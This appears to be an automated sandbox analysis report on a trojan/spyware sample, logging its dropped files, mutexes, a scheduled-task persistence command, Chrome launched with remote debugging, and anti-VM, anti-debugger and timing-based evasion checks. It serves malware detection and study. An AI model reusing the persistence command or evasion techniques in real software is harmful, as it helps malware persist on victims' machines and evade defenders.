Source: nRYpZg6i5E.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: nRYpZg6i5E.exe Static PE information: Section: scgdxyhl ZLIB complexity 0.9943612639793318
Source: nRYpZg6i5E.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/7@16/5
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1960
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_03
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.1873215998.00004690007BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: nRYpZg6i5E.exe Virustotal: Detection: 51%
Source: nRYpZg6i5E.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\nRYpZg6i5E.exe "C:\Users\user\Desktop\nRYpZg6i5E.exe"
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2376,i,13757376621657589230,16986117785964679361,262144 /prefetch:8
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 1812
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2376,i,13757376621657589230,16986117785964679361,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: nRYpZg6i5E.exe Static file information: File size 4458496 > 1048576
Source: nRYpZg6i5E.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: nRYpZg6i5E.exe Static PE information: Raw size of scgdxyhl is bigger than: 0x100000 < 0x1b9800
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00968230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00968230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: nRYpZg6i5E.exe Static PE information: real checksum: 0x4450a6 should be: 0x44afd5
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: nRYpZg6i5E.exe Static PE information: section name: .idata
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: nRYpZg6i5E.exe Static PE information: section name: scgdxyhl
Source: nRYpZg6i5E.exe Static PE information: section name: mvkmyqrl
Source: nRYpZg6i5E.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0096A499 push es; iretd 9_2_0096A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEC2BF0 push eax; mov dword ptr [esp], ebx 9_2_6BEC2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEC2BF0 push edx; mov dword ptr [esp], ebx 9_2_6BEC2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE92AAC push edx; mov dword ptr [esp], ebx 9_2_6BE92AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEA8AA0 push eax; mov dword ptr [esp], ebx 9_2_6BEA909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE90AA2 push eax; mov dword ptr [esp], ebx 9_2_6BE90AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEBEAB0 push eax; mov dword ptr [esp], ebx 9_2_6BEBEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE8A947 push eax; mov dword ptr [esp], ebx 9_2_6BE8A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE88E7A push edx; mov dword ptr [esp], ebx 9_2_6BE88E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE94E31 push eax; mov dword ptr [esp], ebx 9_2_6BE94E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEBED10 push eax; mov dword ptr [esp], ebx 9_2_6BEBEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEF0C30 push eax; mov dword ptr [esp], edi 9_2_6BEF0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE94325 push ecx; mov dword ptr [esp], ebx 9_2_6BE94339
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE662E8 push eax; mov dword ptr [esp], ebx 9_2_6BF16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE66253 push eax; mov dword ptr [esp], ebx 9_2_6BF16AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE66253 push edx; mov dword ptr [esp], edi 9_2_6BF16B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE801CE push eax; mov dword ptr [esp], ebx 9_2_6BE80204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE801D8 push eax; mov dword ptr [esp], ebx 9_2_6BE80204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE801D2 push eax; mov dword ptr [esp], ebx 9_2_6BE80204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE801D4 push eax; mov dword ptr [esp], ebx 9_2_6BE80204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE801D6 push eax; mov dword ptr [esp], ebx 9_2_6BE80204
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE5E0D0 push eax; mov dword ptr [esp], ebx 9_2_6BF16AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE5E0D0 push edx; mov dword ptr [esp], edi 9_2_6BF16B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE90042 push eax; mov dword ptr [esp], ebx 9_2_6BE90056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE8A777 push eax; mov dword ptr [esp], ebx 9_2_6BE8A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE8070E push eax; mov dword ptr [esp], ebx 9_2_6BE806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE806FD push eax; mov dword ptr [esp], ebx 9_2_6BE806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE866F3 push edx; mov dword ptr [esp], ebx 9_2_6BE86707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE986A1 push 890005EAh; ret 9_2_6BE986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE806A2 push eax; mov dword ptr [esp], ebx 9_2_6BE806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE806A6 push eax; mov dword ptr [esp], ebx 9_2_6BE806DA
Source: nRYpZg6i5E.exe Static PE information: section name: scgdxyhl entropy: 7.955672521495908
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBAB7 second address: ACBAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBAC1 second address: ACBAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E9559C89h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBAE1 second address: ACBAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBAE9 second address: ACBAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBEA3 second address: ACBED8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD5E912D9EEh 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007FD5E912D9F3h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACBED8 second address: ACBEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
